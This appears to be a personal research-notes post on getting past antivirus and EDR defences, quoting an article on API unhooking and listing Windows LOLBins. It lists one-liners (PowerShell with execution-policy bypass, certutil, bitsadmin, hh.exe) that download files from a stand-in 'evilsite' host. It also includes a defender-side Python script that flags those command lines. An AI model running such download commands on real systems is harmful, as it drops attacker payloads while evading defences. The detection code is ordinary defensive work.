Notes :: Getting around some Defenses

Trying to read up on this for some work things. Dropping a few links here. Will add more notes as I go on.

——————————————————————

bypassing-cylance-and-other-avs-edrs-by-unhooking-windows-apis

“””
It’s worth noting that not all the functions get hijacked by AVs/EDRs. Usually only those functions that are known to be abused over and over again in the wild get hooked – think CreateRemoteThread, NtQueueApcThread and similar.
“””

This led me to this article: Old School Evil Excel 4 Macros

——————————————————————

Somehow ended up here: Alternate Download Ideas

  • powershell.exe -ep bypass Invoke-WebRequest -Uri http://evilsite:port/evilfile -OutFile c:\temp\evilfile
  • powershell.exe -ep bypass Invoke-RestMethod -Uri http://evilsite:port/evilfile -OutFile c:\temp\evilfile
  • powershell.exe -ep bypass Start-BitsTransfer -Source http://evilsite:port/evilfile -Destination c:\temp\evilfile
  • certutil.exe -urlcache -split -f "http://evilsite:port/evilfile" c:\temp\evilfile
  • bitsadmin /transfer myDownloadJob /download /priority normal http://evilsite:port/evilfile c:\temp\evilfile
  • hh.exe "http://evilsite/evilfile"
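Added here as a defender-side example (my own constructed code, not from the linked post): a small scan that flags process-creation command lines matching the download patterns above. The sample events, rule names and the evilsite URLs are constructed for the demo.

```python
import re

# Constructed sample process-creation command lines (hypothetical, not real telemetry).
SAMPLE_EVENTS = [
    "certutil.exe -urlcache -split -f http://evilsite:8080/evilfile c:\\temp\\evilfile",
    "bitsadmin /transfer myDownloadJob /download /priority normal http://evilsite:8080/evilfile c:\\temp\\evilfile",
    "powershell.exe -ep bypass Invoke-WebRequest -Uri http://evilsite:8080/evilfile -OutFile c:\\temp\\evilfile",
    "hh.exe http://evilsite/evilfile",
    "certutil.exe -hashfile c:\\temp\\setup.msi SHA256",   # benign certutil use, must not fire
    "powershell.exe -File c:\\scripts\\backup.ps1",        # benign powershell use, must not fire
]

# One rule per LOLBin download technique listed in the notes. Each rule requires the
# binary plus the download-specific switch (and a URL where the switch alone is too
# common, e.g. certutil -urlcache is also used for CRL cache maintenance).
RULES = [
    ("certutil_urlcache", re.compile(r"\bcertutil(\.exe)?\b.*-urlcache\b.*https?://", re.I)),
    ("bitsadmin_transfer", re.compile(r"\bbitsadmin(\.exe)?\b.*/transfer\b", re.I)),
    ("powershell_download", re.compile(
        r"\bpowershell(\.exe)?\b.*\b(Invoke-WebRequest|Invoke-RestMethod|Start-BitsTransfer)\b", re.I)),
    ("hh_remote_url", re.compile(r"\bhh(\.exe)?\b.*https?://", re.I)),
]
URL = re.compile(r"https?://[^\s\"']+", re.I)


def classify(cmdline):
    """Return (rule_name, url_or_None) for a matching command line, else None."""
    for name, pattern in RULES:
        if pattern.search(cmdline):
            m = URL.search(cmdline)
            return name, (m.group(0) if m else None)
    return None


def scan(events):
    """Run every event through the rules; return (cmdline, rule, url) for each hit."""
    hits = []
    for event in events:
        result = classify(event)
        if result:
            hits.append((event, result[0], result[1]))
    return hits


if __name__ == "__main__":
    for cmdline, rule, url in scan(SAMPLE_EVENTS):
        print(f"[{rule}] {url}  <-  {cmdline}")
```

The extracted URL is what you would pivot on (proxy logs, DNS) when triaging a hit; tune the benign cases to your environment before alerting on them.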

——————————————————————

Then I started digging more into this, as I probably should have from the beginning: LOLBins
“””
Right now there are:

  • Bitsadmin.exe
  • Certutil.exe
  • Esentutl.exe
  • Expand.exe
  • Extrac32.exe
  • Findstr.exe
  • Hh.exe
  • Ieexec.exe
  • Makecab.exe
  • Replace.exe for Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 and the equivalent Server versions.
“””